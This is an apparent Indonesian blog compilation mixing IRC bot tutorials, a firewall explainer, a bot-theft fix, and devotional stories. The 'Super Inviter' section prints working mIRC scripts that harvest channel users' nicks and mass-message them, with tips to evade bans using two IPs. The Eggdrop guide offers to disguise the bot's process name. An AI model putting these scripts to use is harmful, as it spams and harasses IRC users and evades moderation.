13. Bagaimanapun juga, kami semua senasib seperjuangan.

Terima Kasih kepada ^family_code^ atas bimbingan dan pengajaran. Terima kasih pada kawan - kawan seperjuangan.Semoga ini menjadi pegangan dan ikatan kita.

Karikatur Nabi Muhammad

Beberapa hari ini semua orang membicarakan dan meributkan dengan masalah salah satu media denmark yang membuat karikatur yang disebut-sebut menjelekkan Nabi Muhammad.

Sejauh ini telah menyebabkan begitu banyak Kedutaan besar di Negara - negara Islam di protes dan beberapa diantaranya di bakar.Bahkan di Indonesia hal serupa terjadi di Jakarta dan Surabaya.

Mungkin kawan-kawan sekalian penasaran apa yang diributkan oleh orang banyak.Berikut ini saya berikan linknya.

-= http://www.muhammadcartoons.com =-

Rupanya hal ini malah memancing banyak reaksi negatif juga di dunia 'maya'.Hal ini malah membawa ke bentuk provokasi. Begitu banyak website yang muncul pasca kejadian tersebut; salah satunya situs berikut ini:

-= http://www.muhammadcartoons.com/ =-

Nah silahkan dech kalian melihatnya dan mencoba menilai bagaimana????
Jawaban ada pada anda sendiri dan biarlah itu menjadi bagian penilaian pada diri anda sendiri.
Saya disini tidak mau memihak maupun meributkan dan apalagi berusaha menghasut.Tapi saya hanya berharap hal seperti ini tidak pernah terjadi lagi. Biarkanlah kita tetap tenang dan tidak terhasut oleh semua tindakan yang berusaha menghancurkan manusia dengan memecah-mecahnya.

Penulis tidak bertanggung jawab atas tindakan yang dilakukan karena membaca tulisan ini. Tulisan ini hanyalah sebagai informasi.

Membuat Eggdrop NetGate pada shell

Selama ini pada saat saya Chatting di IRC.Dal.Net, banyak orang selalu bertanya dan memohon bantuan pada saya untuk membuat Bot atau PsyBNC pada shell mereka. Cukup banyak sudah orang yang mendapatkan pengajaran dari saya. Nah pada kesempatan ini saya akan berbagi sedikit bersama kawan semua untuk memberikan Tutor sedikit bagaimana membuat Eggdrop pada shell. Dalam hal ini shell pada sistem operasi linux.
Nah mari kita mulai Tutor kita kali ini:

1. Nah seperti biasanya sebelum kita memulai sesuatu marilah kita menyiapkan diri kita agar dapat bekerja dengan baik.
2. Jangan lupa untuk menyalakan rokok dan minum segelas kopi hangat agar diri kita tetap santai dalam melakukan segala sesuatunya.
3. Hmm...setelah anda santai dan rileks barulah kita bisa memulai nya.
4. Pertama kali ambillah eggdrop yang kita inginkan pada situs kesayangan kita, atau dalam hal ini kita akan ambil eggdrop keluaran Netgate pada http://geocities.com/kake_rgb/bot/eggdrop.tgz. Nah cara mengambil terserah pada anda. Salah satu alternatif adalah dengan mendownload dulu file eggdrop ke kompi anda, lalu setelah itu dengan menggunakan layanan ftp pada shell anda maka anda tinggal menaruh file eggdrop pada shell anda. Alternatif lain adalah jika anda menggunakan sistem operasi linux pada shell anda maka anda dapat mendownload secara langsung dengan menggunakan fasilitas layanan, Misal : wget http://geocities.com/kake_rgb/bot/eggdrop.tgz.
5. Nah setelah kita sudah mendapatkan file eggdrop.tgz pada shell anda barulah kita melakukan ekstrak pada file tersebut. Untuk melakukannya kita tinggal mengetikkan : tar -zxvf . Dalam kasus ini adalah : tar -zxvf eggdrop.tgz. Nah setelah terekstrak maka anda akan menemukan sebuah directory eggdrop.
6. Lalu akses lah direktory tersebut dengan mengetikkan : cd eggdrop
7. Setelah kita berada pada direktori eggdrop. Maka kita akan disuguhkan beberapa file dan direktori untuk membuat bot netgate tersebut, sebagai berikut:

[januar@server eggdrop]$ ls
doc filesys language lokasi.csv scripts start xh
eggdrop help logs README setting.conf text
[januar@server eggdrop]$

8. File setting.conf : adalah merupakan file utama konfigurasi yang akan digunakan.Nah untuk menjalankannya ketik : ./start
Maka akan tampil sebagai berikut:

[januar@server eggdrop]$ ./start

#########################################
## Eggdrop File Config Generator 1.0 ##
## Created by MAXFIDER ##
## eggdrop@maxfider.com ##
#########################################

Cara Penggunaan:

./start ""

filename = nama file konfigurasi
nick = nama nick untuk bot
ident = ident untuk bot
ip = alamat IP yang digunakan (numeric)
fullname = fullname untuk bot, gunakan petik untuk lebih dari 1 kata
channel = channel bot untuk join (tanpa karakter #)
owner = nick untuk owner

[januar@server eggdrop]$

9. Nah untuk membuat bot kita cukup ikuti sesuai petunjuk. Misal aku ingin bikin file konfigurasi sebagai berikut :

[januar@server eggdrop]$ ./start botk4k3 botk4k3 Crewk4k3 192.168.21.21 "Bot milik k4k3" hackcrew k4k3

Maka akan ditampilkan menu:

#########################################
## Eggdrop File Config Generator 1.0 ##
## Created by MAXFIDER ##
## eggdrop@maxfider.com ##
#########################################

File konfigurasi : botk4k3
set nick "botk4k3"
set username "Crewk4k3"
set my-hostname "192.168.21.21"
set my-ip "192.168.21.21"
set realname "Bot milik k4k3"
set basechan "#hackcrew"
set owner "k4k3"

------------------------------------
File konfigurasi berhasil dibuat !!!
------------------------------------
Langkah berikutnya, pilihlah salah satu menu berikut:
(1) Jalankan eggdrop dengan menyamarkan nama program
(2) Jalankan eggdrop dengan nama asli
(3) Keluar dari program ini

Masukkan pilihan [1|2|3]:

jika itu shell anda sendiri maka pilihlah no 2.Ketik kan angka : 2
Jika semua berjalan lancar maka akan ditampilkan menu sebagai berikut :

STARTING BOT IN USERFILE CREATION MODE.
Telnet to the bot and enter 'NEW' as your nickname.
OR go to IRC and type: /msg botk4k3 hello
This will make the bot recognize you as the master.

[19:50] === botk4k3: 0 channels, 0 users.
Launched into the background (pid: 6460)

setelah itu tunggulah bot anda di channel anda dan sapa lah ia dengan mengetik :
/msg botk4k3 hello
Maka dia akan mengenali anda sebagai owner nya. Jangan lupa setting passwd dan bacalah keterangannya dengan mengetik /msg botk4k3 help

Nah selamat mengkonfigurasi bot anda.
Untuk jenis bot Netgate lain tinggal menyesuaikan saja.Ikuti saja keterangan yang ada, saya rasa cukup mudah.Terima kasih atas perhatiannya.
Demikian lah artikel ini dibuat untuk menjadi pengetahuan bagi anda.Segala tindakan yang dilakukan karena membaca artikel ini bukan merupakan tanggung jawab penulis.

Si Tembok Api;

Apa itu Firewall...

Fungsi firewall dalam dunia komputer adalah berfungsi mencegah malware menyebar ke tempat lain dan mencegah malware masuk ke komputer.
Firewall boleh dibilang adalah suatu perangkat, baik lunak maupun keras yang menyaring informasi yang datang dari internet ke komputer. Jika paket informasi yang datang ditandai oleh filter, maka paket tidak boleh lewat. Firewal diposisikan berada antara internet dan komputer.

Firewall menggunakan salah satu atau kombinasi dari 3 metode untuk mengontrol lalu lintas di jaringan. Metode metode itu adalah penyaringan paket (packet filtering), layanan proksi (proxy service) dan penyelidikan berdasarkan bagian tertentu dari packet (statefull inspection).

Packet filtering.
Dalam jaringan. internet, data dipilah menjadi beberapa paket dan dikirimkan secara simultan. metode penyaringan paket ini menganalisis paket berdasarkan filter tertentu. Paket yang aman dibiarkan berlenggang ke sistem yang membutuhkan. Dan yang lainnya ditahan.

Proxy Service.
Metode ini membuat firewall mengamankan informasi dari internet dan mengirimkannya ke komputer yang meminta informasi itu.

Stateful Infection.
Dengan menggunakan metode ini, firewall tidak memeriksa setiap paket tapi membandingkan bagian tertentu dari paket dengan basis data tang berisi informasi yang dapat dipercaya. Informasi yang berjalan-jalan di dalam firewall ke luar dimonitor untuk menentukan karakteristiknya. Kemudian informasi yang masuk dibandingkan dengan karakteristik itu.

Penyaring.
Firewall dapat dikostumasi yang berarti seseorang dapat menambah dan menghapus filter berdasarkan kondisi tertentu. Berikut ini adalah beberapa penyaring yang bisa ditambah atau dihapus.
1. Alamat IP
Setiap komputer yang terhubung ke internet pasti memiliki alamat Ip yang berupa nomor 32 bit. 216.27.61.137 adalah contoh alamat IP. Firewall bisa memblok lalu lintas komputer dengan alamat IP tertentu. Kalau sudah begitu, data tidak bisa datang atau pergi dari komputer yang alamat IP-nya sudah di blok.
2. Nama Domain.
Sulit toh mengingat alamat IP. Makanya sebagai ganti alamat IP, diciptakan nama domain yang lebih mudah dibaca oleh manusia. Contoh nama domain adalah www.jasakom.com. Firewall dapat digunakan untuk menutup akses ke suatu domain tertentu atau mengarahkan komputer agar cuma bisa ke domain tertentu.
3. Protokol.
Protokol adalah suatu cara agar seseorang yang hendak menggunakan suatu layanan dapat "berbicara" dengan layanan itu. Protokol menggambarkan cara klien dan server berkomunikasi.
Beberapa protokol yang dapat digunakan firewall sebagai penyaring adalah:
* IP (Internet Protocol) mengatur informasi di Internet.
* TCP ( Transmission Control Protocol) memecah dan membangun kembali informasi yang berjalan di Internet.
* HTTP (Hypertext Transfer Protocol) mengatur halama situs Web.
* FTP (File Transfer Protocol) digunakan untuk mengunduh dan memasukkan file.
* UDP (User Datagram Protocol) digunakan untuk informasi yang tidak membutuhkan respons seperti streaming suara dan video.
* ICMP (Internet Control Message Protocol) digunakan oleh router untuk bertukar informasi dengan router lain.
* SMTP (Simple Mail Transport Protocol) digunakan untuk mengirim email.
* SNMP (Simple Network Management Protocol) digunakan untuk mengumpulkan informasi sistem dari suatu komputer yang dikendalikan dari jarak jauh.
* Telnet digunakan untuk memberikan perintah kepada komputer yang dikendalikan jarak jauh.
4. Port.
Layanan dari server bisa diakses melalui sejumlah port. Satu port untuk satu layanan. Misal, server membuka layanan FTP yang ada di port 21. Firewall bisa memblok port itu agar orang tidak bisa mengunduh atau memasukkan file.
5. Kata atau Frasa Spesifik.
Firewall akan mengendus setiap paket informasi untuk mencari kata atau frasa yang sama persis dengan yang sudah diatur di Firewall. Persis disini tidak main-main, tapi betul-betul persis. Misal kata yang dimasukkan adalah "film-XXX". Andai dalam paket terdapat frasa "film-XXX", maka paket itu akan boleh dilewatkan.

Sumber : majalah PC+ januari, 2006

Super Inviter IRC

Berikut ini Saya akan berikan beberapa tips & trik serta sedikit tutor untuk membuat Super Inviter ala anak-anak jasakom.
Gunakanlah ini untuk kebaikan, walau daku tidak menggunakannya. Namun ini sudah di coba kawan-kawan di jasakom.

1. Expert Inviter (Anti Banned) by CyberMad, kecuali oleh IRC Cop.
Cara kerjanya adalah mIRC 1 (Spy) mencatat data nick yang join ke suatu channel ke InviteList.txt pada folder Data. Lalu mIRC 2 (Inviter) mengambil data nick, lalu mengirim pesan invite. Bila nick tersebut OP, Voice, Quit, ganti Nick, error Nick akan segera di delete nicknya. Pastikan menggunakan 2 IP berbeda.

Berikut ini script pada mIRC 1 yang bertugas sebagai spy / mata-mata. Pastikan anda sudah membuat folder Data pada direktori mIRC.

[ REMOTE ]
#ExpertInvite off
on 1:join:#: {
if ($nick == $me) { halt } | else { set %nick $nick | write Data/InviteList.txt %nick }
}
on 1:op:#: {
write -dw* $+ $opnick $+ * Data/InviteList.txt
echo -s * __7I__12nvite to (_1 $+ $opnick $+ _12) stoped! They were oped in (_1 $+ $chan $+ _12)
}
on 1:voice:#: {
write -dw* $+ $vnick $+ * Data/InviteList.txt
echo -s * __7I__12nvite to (_1 $+ $vnick $+ _12) stoped! They were voiced in (_1 $+ $chan $+ _12)
}
on 1:quit: {
if ($nick == me) { halt } | else { write -dl1 Data/InviteList.txt | echo -s * __7I__12nvite to (_1 $+ $nick $+ _12) stoped! They quit IRC }
write -dw* $+ $nick $+ * InviteList.txt
}
on 1:nick: {
write -dw* $+ $nick $+ * Data/InviteList.txt
write Data/InviteList.txt $newnick
echo -s * __7I__12nvite to (_1 $+ $nick $+ _12) stoped! They changed there nickname to (_1 $+ $newnick $+ _12)
}
raw 401:*: {
write -dw* $+ $2 $+ * Data/InviteList.txt
echo -a * __7E__12rror sending invite to (_1 $+ $2 $+ _12) aborting
}
#ExpertInvite end

[POPUP-menubar]
Expert
.Start Spy:/enable #ExpertInvite
.Stop Spy:/disable #ExpertInvite

Berikut ini script pada mIRC 2 yang bertugas sebagai Inviter.
[REMOTE]
on 1:START: titlebar .:: MadCodes Script ::. OffLine [[ %InvitedPeople people invited ]]
on 1:CONNECT: titlebar .:: MadCodes Script ::. OnLine [[ %InvitedPeople people invited ]]
on 1:DISCONNECT: titlebar .:: MadCodes Script ::. OffLine [[ %InvitedPeople people invited ]]

[POPUP-menubar]
Start Invite:/StartInvite
Stop Invite:/timerInvite off
-
Set Message:/set %ExpertInviter.Message $$?="Message"

[ALIASES]
/StartInvite /timerInvite 0 5 /gabung
/gabung /set %invite $read -l1 ../Data/InviteList.txt | msg %invite %ExpertInviter.Message | inc %InvitedPeople | write -dl1 ../Data/InviteList.txt


2. Advanced Inviter

Tipe inviter satu ini hampir mirip dengan xGuest, tetapi kelebihan yang satu ini adalah OpenSource dan langsung di mIRC hehehe. Jadi dapat lu kembangkan menjadi lebih baik.

Save script dibawah dengan nama massinviteoke.mrc di folder mIRC, lalu load file tersebut dari mIRC.

Credit: Script untuk Advanced Inviter (massinviteoke.mrc) bukan buatan saya (CyberMad), saya hanya menulis ulang disini. Sangat disayangkan... saya tidak mengetahui nama pembuat aslinya.



on 1:LOAD:/auser me $me
alias tanya {
if ( %tc == $null ) { set %tc $chan }
if ( %server = $null ) { /set %server $$?="enter SERVER" }
if ( %msg != $null ) goto msg1
:msg
/set %msg $$?=" enter message"
:msg1
//echo -a 5This is your message: %msg
/set %msgok $$?="Message okay? Y/N"
if ( %msgok == N ) { goto msg | halt }
/undang
/unset %msgok
}
alias undang {
set %tp $nopnick(%tc,0)
set %pn 1
:begin
set %p $nopnick(%tc,%pn)
/write penghuni.txt %p
inc %pn
if ( %pn >= %tp ) { goto end }
goto begin
:end
/part %tc
/pesan
}
alias pesan {
:mulai
inc %cunt1
if ( %cunt > %tp ) { .remove penghuni.txt | unset %tc | unset %tp | unset %pn | unset %p | unset %pn1 | unset %cunt | unset %cunt1 | /echo -s DONE! | /quit | halt }
set %p $read -l $+ %cunt penghuni.txt
set %FILTER3 $addtok(%FILTER3,%p,44)
if ($gettok(%FILTER3,0,44) == 4) { .msg $gettok(%FILTER3,1-4,44) %msg | unset %FILTER3 }
/echo -s 12 Msg sent to 4 $read -l $+ %cunt penghuni.txt 1 at 3 %tc 6 %cunt of %tp
inc %cunt
if ( %cunt1 == 51 ) { /timer 1 2 /unset %cunt1 | /timer 1 5 /quit leaving | /timer 1 7 /server %server | halt }
goto mulai
}
raw 401:*: { halt }
raw 403:*: { halt }
on 1:CONNECT: {
if ( %cunt == $null ) { halt }
/pesan
}
menu menubar {
<< G-Mass-Inviter >>
-
Join a channel (invite from this channel): /set %tc $$?="Enter channel invite from" | /join %tc
-
Start Mass-invite: /tanya
-
End Mass-invite / Reset: /disconnect | unset %tc %tp %pn %p %cunt* | remove penghuni.txt
}

on me:JOIN:#: set %tc $chan
alias undangall {
set %tp $nick(%tc,0)
set %pn 1
:begin
set %p $nick(%tc,%pn)
/write penghuni.txt %p
inc %pn
if ( %pn >= %tp ) { goto end }
goto begin
:end
/part %tc
/pesan
}
on 1:CHAT:*: /ignore -pntik *!*@*

Nah demikian saja sedikit informasi dan ilmu saya bagikan, semoga menikmati.Maaf penulis tidak bertanggung jawab atas tindakan yang dilakukan karena artikel ini, artikel ini hanya dibuat untuk pengetahuan.Segala sesuatu yang berkaitan dengan artikel ini bukan lah tanggung jawab penulis.

NB: Tutor diambil dari -= http://www.jasakom.com =-

Ketika aku sudah tua

Ketika aku sudah tua, bukan lagi aku yang semula. Mengertilah, bersabarlah sedikit terhadap aku.

Ketika pakaianku terciprat sup, ketika aku lupa bagaimana mengikat sepatu, ingatlah bagaimana dahulu aku mengajarmu.

Ketika aku berulang-ulang berkata-kata tentang sesuatu yang telah bosan kau dengar, bersabarlah mendengarkan, jangan memutus pembicaraanku. Ketika kau kecil, aku selalu harus mengulang cerita yang telah beribu-ribu kali kuceritakan agar kau tidur.

Ketika aku memerlukanmu untuk memandikanku, jangan marah padaku. Ingatkah sewaktu kecil aku harus memakai segala cara untuk membujukmu mandi?

Ketika aku tak paham sedikitpun tentang tehnologi dan hal-hal baru, jangan mengejekku. Pikirkan bagaimana dahulu aku begitu sabar menjawab setiap "mengapa" darimu.

Ketika aku tak dapat berjalan, ulurkan tanganmu yang masih kuat untuk memapahku. Seperti aku memapahmu saat kau belajar berjalan waktu masih kecil.

Ketika aku seketika melupakan pembicaraan kita, berilah aku waktu untuk mengingat. Sebenarnya bagiku, apa yang dibicarakan tidaklah penting, asalkan kau disamping mendengarkan, aku sudah sangat puas.

Ketika kau memandang aku yang mulai menua, janganlah berduka. Mengertilah aku, dukung aku, seperti aku menghadapimu ketika kamu mulai belajar menjalani kehidupan. Waktu itu aku memberi petunjuk bagaimana menjalani kehidupan ini, sekarang temani aku menjalankan sisa hidupku. Beri aku cintamu dan kesabaran, aku akan memberikan senyum penuh rasa syukur, dalam senyum ini terdapat cintaku yang tak terhingga untukmu.

Cegah Pencuri Bot di IRC.DAL.NET

Pada beberapa waktu lalu saya sudah memberikan sedikit pengalaman dan sedikit sharing tentang bagaimana mencuri bot. Hal ini dapat terjadi karena TCL NetGate memiliki bug, dan banyak orang telah memodifikasinya sehingga mereka menambahkan owner serta basechan mereka. Sekarang sudah saat nya saya memberikan cara bagaimana untuk menangkalnya. Fix yang akan kita lakukan ini agak sedikit bervariasi, karena TCL NetGate sendiri di kembangkan oleh banyak orang sehingga bergantung pada siapakah yang memodifikasinya. Nah untuk itu mari kita mulai dengan tutorial kecil kita.Untuk itu marilah ikuti langkah-langkah seperti berikut:

1. Yang pertama kali adalah jangan lupa untuk hidupkan kompi dan duduk di depan kompi mu.
2. Eits sebelum memulai beraksi, kita harus menyiapkan diri agar tetap tenang dan dapat berpikir jernih. Jangan lupa rokok, korek dan segelas topi hitam hangatnya.
3. Nah setelah semua siap maka, hmmm .... nyalakan dulu rokoknya donk. Nah setelah itu teguklah kopi hitam kental dan hangat yang akan membuat perasaan tenang dan nikmat.
4. Setelah kita bisa tenang dan berpikir jernih maka waktu nya bagi kita untuk siap beraksi.
5. Pertama kali kita harus membuka TCL nya, dalam hal ini namanya bisa bermacam-macam tapi yang pasti yang merupakan TCL pengaturan botnya.
6. Nah yang harus kita lakukan pada TCL nya adalah dengan menghilangkan auto owner dari sang pembuat script.Maaf disini aku tidak akan memberitahu secara rinci mengenai penghapusan penambahan owner dan basechan. Karena hal ini sangat ditentukan oleh siapa perombak tcl tersebut. So beda-beda tiap nama tcl turunan NetGate.
7. Nah klo itu semua sudah beres dan bot kita tidak lagi join ke channel aneh2 ato melakukan sesuatu yg aneh2 maka tinggal kita kelarkan dech bug dasar dari TCL netgate ini.
8. Carilah barisan script sebagai berikut:

bind ctcp - UNBAN sl_ctcp
bind ctcp - TIME sl_ctcp
bind ctcp - VERSION sl_ctcp
bind ctcp - CHAT chat_ctcp

9. Nah setelah itu tambahkanlah barisan script berikut :

bind ctcp - PING ping_reply

10. Nah aman dech sekarang bot kamu dari para pencuri untuk sementara.hmmm SEmentara????
IYah sistem itu tidak ada yang sempurna, yang ada adalah yang lebih baik dan kurang baik. Saya tidak menjamin sepenuhnya bot kamu tidak akan dapat gangguan lain, so bongkar lebih dalam tcl nya okeh untuk terus menyempurnakannya.

DEmikianlah mungkin saya berbagi pengalaman dan informasi sedikit mengenai TCL NETGATE dan turunannya.

A Deck of Cards

I get This from Internet, Read This:


It was quiet that day, the guns, the mortars and the land mines for some reason hadn't been heard.

The young soldier knew it was Sunday, the holiest day of the week.

As he was sitting there, he got out an old deck of cards and laid them out across his bunk.

Just then an army sergeant came in and said, "Why aren't you with the rest of the platoon?

The soldier replied, "I thought I would stay behind and spend some time with the Lord."

The sergeant said, "Looks to me like you're going to play cards."

The soldier said, "No, sir. You see, since we are not allowed to have Bibles or other spiritual books in this country, I've decided to talk to the Lord by studying this deck of cards."

The sergeant asked in disbelief, "How will you do that?"

"You see the Ace, Sergeant? It reminds me that there is only one God.

"The Two represents the two parts of the Bible, Old and New Testaments.

"The Three represents the Father, Son, and the Holy Ghost.

"The Four stands for the Four Gospels: Matthew, Mark, Luke and John.

"The Five is for the five virgins that were ten but only five of them were glorified.

"The Six is for the six days it took God to create the Heavens and Earth.

"The Seven is for the day God rested after making His Creation.

"The Eight is for the family of Noah and his wife, their three sons and their wives - the eight people God spared from the flood that destroyed the earth.

"The Nine is for the lepers that Jesus cleansed of leprosy. He cleansed ten, but nine never thanked Him.

"The Ten represents the Ten Commandments that God handed down to Moses on tablets made of stone.

"The Jack is a reminder of Satan, one of God's first angels, but he got kicked out of heaven for his sly and wicked ways and is now the joker of eternal hell.

"The Queen stands for the Virgin Mary.

"The King stands for Jesus, for he is the King of all kings.

"When I count the dots on all the cards, I come up with 365 total, one for every day of the year.

"There are a total of 52 cards in a deck; each is a week, 52 weeks in a year.

"The four suits represent the four seasons: Spring, Summer, Fall and Winter.

"Each suit has thirteen cards; there are exactly thirteen weeks in a quarter

"So when I want to talk to God and thank Him, I just pull out this old deck of cards and they remind me of all that I have to be thankful for."

The sergeant just stood there. After a minute, with tears in his eyes and pain in his heart, he said, "Soldier, may I borrow that deck of cards?"

A Letter From God

Aku ada artikel sedikit yang menurutku cukup bagus.

Saat kau bangun dipagi hari, Aku memandangmu dan berharap engkau akan berbicara kepadaKu, walaupun hanya sepatah kata, meminta pendapatKu atau bersyukur kepadaKu atas sesuatu hal indah yang terjadi di dalam hidupmu kemarin, tetapi aku melihat engkau begitu sibuk mempersiapkan diri untuk pergi bekerja.

Aku kembali menanti. Saat engkau sedang bersiap, Aku tahu akan ada sedikit waktu bagimu untuk berhenti dan menyapaKu, tetapi engkau terlalu sibuk. Di satu tempat, engkau duduk di sebuah kursi selama lima belas menit tanpa melakukan apapun.

Kemudian Aku melihat engkau menggerakkan kakimu. Aku berpikir engkau ingin berbicara kepadaKu tetapi engkau berlari ke telepon dan menelepon seorang teman untuk mendengarkan gosip terbaru. Aku melihatmu ketika engkau pergi bekerja dan Aku menanti dengan sabar sepanjang hari.

Dengan semua kegiatanmu, Aku berpikir engkau terlalu sibuk untuk mengucapkan sesuatu kepadaKu. Sebelum makan siang Aku melihatmu memandang kesekeliling, mungkin engkau merasa malu untuk berbicara kepadaKu, itulah sebabnya mengapa engkau tidak menundukkan kepalamu. Engkau memandang tiga atau empat meja sekitarmu dan melihat beberapa temanmu berbicara kepadaku dengan lembut sebelum mereka makan, tetapi engkau tidak melakukannya.

Tidak apa-apa. Masih ada waktu yang tersisa, dan Aku berharap engkau akan berbicara kepadaKu, meskipun saaat engkau pulang ke rumah kelihatannya seakan-akan banyak hal yang harus kau kerjakan. Setelah beberapa hal tersebut selesai engkau kerjakan, engkau menyalakan televisi, Aku tidak tahu apakah kau suka menonton televisi atau tidak, hanya saja engkau selalu kesana dan menghabiskan banyak waktu setiap hari didepannya, tanpa memikirkan apapun hanya menikmati acara yang ditampilkan.

Kembali Aku menanti dengan sabar saat engkau mnonton TV dan menikmati makananmu tetapi kembali kau tidak berbicara kepadaKu. Saat tidur Kupikir kaumerasa terlalu lelah. Setelah mengucapkan selamat malam kepada keluargamu, kau melompat ke tempat tidur dan tertidur tak lama kemudian. Tidak apa-apa karena mungkin engkau tidak menyadari bahwa Aku selalu hadir untukmu. Aku telah bersabar lebih lama dari yang kau sadari.

Aku bahkan ingin mengajarkanmu bagaimana bersabar terhadap orang lain.Aku sangat mengasihimu, setiap hari Aku menantikan sepatah kata, doa atau pikiran atau syukur dari hatimu. Baiklah... engkau bangun kembali dan kembali. Aku akan menanti dengan penuh kasih bahwa hari ini kau akan memberiKu sedikit waktu. Semoga harimu menyenangkan.

Bapamu,
ALLAH